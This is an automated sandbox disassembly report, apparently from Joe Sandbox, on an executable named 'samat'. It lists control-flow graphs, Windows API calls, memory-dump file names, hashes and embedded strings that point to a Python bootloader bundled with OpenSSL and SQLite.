                                                                                                                                                                                                                                                                                      control_flow_graph 1560 7ff7e12c1210-7ff7e12c126d call 7ff7e12cbd80 1563 7ff7e12c126f-7ff7e12c1296 call 7ff7e12c2710 1560->1563 1564 7ff7e12c1297-7ff7e12c12af call 7ff7e12d4f44 1560->1564 1569 7ff7e12c12b1-7ff7e12c12cf call 7ff7e12d4f08 call 7ff7e12c2910 1564->1569 1570 7ff7e12c12d4-7ff7e12c12e4 call 7ff7e12d4f44 1564->1570 1582 7ff7e12c1439-7ff7e12c146d call 7ff7e12cba60 call 7ff7e12d4f30 * 2 1569->1582 1576 7ff7e12c12e6-7ff7e12c1304 call 7ff7e12d4f08 call 7ff7e12c2910 1570->1576 1577 7ff7e12c1309-7ff7e12c131b 1570->1577 1576->1582 1578 7ff7e12c1320-7ff7e12c1345 call 7ff7e12d039c 1577->1578 1588 7ff7e12c1431 1578->1588 1589 7ff7e12c134b-7ff7e12c1355 call 7ff7e12d0110 1578->1589 1588->1582 1589->1588 1596 7ff7e12c135b-7ff7e12c1367 1589->1596 1598 7ff7e12c1370-7ff7e12c1398 call 7ff7e12ca1c0 1596->1598 1601 7ff7e12c1416-7ff7e12c142c call 7ff7e12c2710 1598->1601 1602 7ff7e12c139a-7ff7e12c139d 1598->1602 1601->1588 1603 7ff7e12c1411 1602->1603 1604 7ff7e12c139f-7ff7e12c13a9 1602->1604 1603->1601 1606 7ff7e12c13d4-7ff7e12c13d7 1604->1606 1607 7ff7e12c13ab-7ff7e12c13b9 call 7ff7e12d0adc 1604->1607 1608 7ff7e12c13ea-7ff7e12c13ef 1606->1608 1609 7ff7e12c13d9-7ff7e12c13e7 call 7ff7e12e9e30 1606->1609 1613 7ff7e12c13be-7ff7e12c13c1 1607->1613 1608->1598 1612 7ff7e12c13f5-7ff7e12c13f8 1608->1612 1609->1608 1617 7ff7e12c13fa-7ff7e12c13fd 1612->1617 1618 7ff7e12c140c-7ff7e12c140f 1612->1618 1614 7ff7e12c13cf-7ff7e12c13d2 1613->1614 1615 7ff7e12c13c3-7ff7e12c13cd call 7ff7e12d0110 1613->1615 1614->1601 1615->1608 1615->1614 1617->1601 1620 7ff7e12c13ff-7ff7e12c1407 1617->1620 1618->1588 1620->1578
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                                      • Opcode ID: 95934225c7861964a86c5fd243f738637417d3f2bd857982cceff62bbcb17e09
                                                                                                                                                                                                                                                                                      • Instruction ID: 853aabfe5072ced9c79ec08722657eb072b097d7335e90c100d5baa31dfaff51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95934225c7861964a86c5fd243f738637417d3f2bd857982cceff62bbcb17e09
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A451C422B0868285E720BB11EC423BAE298FF85794FD44133EE4D47B95EEBCE441D712

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1622 7ff7e12ded10-7ff7e12ded62 1623 7ff7e12dee53 1622->1623 1624 7ff7e12ded68-7ff7e12ded6b 1622->1624 1627 7ff7e12dee55-7ff7e12dee71 1623->1627 1625 7ff7e12ded75-7ff7e12ded78 1624->1625 1626 7ff7e12ded6d-7ff7e12ded70 1624->1626 1628 7ff7e12ded7e-7ff7e12ded8d 1625->1628 1629 7ff7e12dee38-7ff7e12dee4b 1625->1629 1626->1627 1630 7ff7e12ded8f-7ff7e12ded92 1628->1630 1631 7ff7e12ded9d-7ff7e12dedbc LoadLibraryExW 1628->1631 1629->1623 1632 7ff7e12dee92-7ff7e12deea1 GetProcAddress 1630->1632 1633 7ff7e12ded98 1630->1633 1634 7ff7e12dee72-7ff7e12dee87 1631->1634 1635 7ff7e12dedc2-7ff7e12dedcb GetLastError 1631->1635 1638 7ff7e12deea3-7ff7e12deeca 1632->1638 1639 7ff7e12dee31 1632->1639 1636 7ff7e12dee24-7ff7e12dee2b 1633->1636 1634->1632 1637 7ff7e12dee89-7ff7e12dee8c FreeLibrary 1634->1637 1640 7ff7e12dee12-7ff7e12dee1c 1635->1640 1641 7ff7e12dedcd-7ff7e12dede4 call 7ff7e12d5208 1635->1641 1636->1628 1636->1639 1637->1632 1638->1627 1639->1629 1640->1636 1641->1640 1644 7ff7e12dede6-7ff7e12dedfa call 7ff7e12d5208 1641->1644 1644->1640 1647 7ff7e12dedfc-7ff7e12dee10 LoadLibraryExW 1644->1647 1647->1634 1647->1640
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE8C
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7E12DF0AA,?,?,-00000018,00007FF7E12DAD53,?,?,?,00007FF7E12DAC4A,?,?,?,00007FF7E12D5F3E), ref: 00007FF7E12DEE98
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                      • Instruction ID: 1b650c0e31b8721e017b0af88d963a610a528f0ca67c809660a10f3d39ba552e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A641F722B1960241EB16EB16DC02775A299BF49BA0FC9453BDD1D57384DFBCE405C326

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36E1
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C3804), ref: 00007FF7E12C36EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                      • Instruction ID: 971a2f209c4a8f0fc8bffeea66a44aced6b79d9d314c46b23a61a96cf6deef61
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C219651B1854241FB25B724EC063B6A258BF84354FC08133E75E825D5EEBCE108C322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                                                                      • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                                      • API String ID: 3510742995-879093740
                                                                                                                                                                                                                                                                                      • Opcode ID: c49cf4d78548e88d96e6518935fb125b3f34a24330c009978db129c1e6e07f2a
                                                                                                                                                                                                                                                                                      • Instruction ID: 4c506aa90831c59534059ef8c229b503f9eaf5063b6afa9f40f7b1f01fe4ad28
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c49cf4d78548e88d96e6518935fb125b3f34a24330c009978db129c1e6e07f2a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DE18422E09B928AEB15CF6981402BD27A5EF45BD8F058235DF1D177A6DF38E853C348
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                                                      • Instruction ID: e7d519d65b728c48832a4c23c7b796c3002ee6340edb93491681c20126f4e3bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFC1E423B0C68695E760AB15D8163BDAB58FB86B80FD54133EA4D03791CEFEE4458723
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
                                                                                                                                                                                                                                                                                      • API String ID: 193678381-2714770296
                                                                                                                                                                                                                                                                                      • Opcode ID: f45773da2448751231a1ca749fc05bc9d2df97a6a3f744ec35cbeb086fc78321
                                                                                                                                                                                                                                                                                      • Instruction ID: b7ec3aa805d0e96575cf0b4c43a127b49e4a11b81759eabe126c6ae4de1c9a1a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f45773da2448751231a1ca749fc05bc9d2df97a6a3f744ec35cbeb086fc78321
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B615B32A0878685EB609F29E8503BD37A4FB49B88F1C8036DB8E47795CF3DD4568718
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                      • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                                                      • Instruction ID: fab8920e11336db158a54e81db28b503af548b9439bab134c325a0d5914dcd32
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41418121B18A8691EB25EB20EC163EAA319FF44340FC04133EB5D43695EFBCE515C362
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4575154004.00007FF8B8331000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8B8330000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575093919.00007FF8B8330000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575154004.00007FF8B83B3000.00000020.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575421069.00007FF8B83DD000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83E8000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8330000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                                                                                      • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                                                                                      • Instruction ID: eac5e0da906434094f5ec637b4fce7e1840e017320c98ef2788103b7e8041eda
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77213A22E0868242FA50AB29E9012BE6251EF8DBD4F5C1231EB5D066D6DF3CE5928748
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memset$CreateFile
                                                                                                                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                                                      • API String ID: 333288564-3829269058
                                                                                                                                                                                                                                                                                      • Opcode ID: 91a16a29fa85a4b7500c484f2e0290924f29dc3ca7676500eb30cdcc977ab085
                                                                                                                                                                                                                                                                                      • Instruction ID: eda0393c317d6df5dadb6ac1c8f46ea97a9808f529357d659ef1c001d46216d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91a16a29fa85a4b7500c484f2e0290924f29dc3ca7676500eb30cdcc977ab085
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2026D21A0EB43C6FA649B29A85477973A0FF84BD5F084635DB4E067A4DF7CE446CB08
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                      • Instruction ID: e07611010984c9507fef69f2c8b75ea74036e99cd747d787f63fc1a18644f364
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2941A363E1878187F714AB20E911369A264FB943A4F509336E69C03AD5DFFCA5E08751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                      • Instruction ID: 958985c6d6ec0a8b3db471f2ef67f5c222c36460162f58a3485d614efc59f2ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83310821F0854741EB15BB659C233B99689AF81344FC85037EA0E572D7DEFDA914C363
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
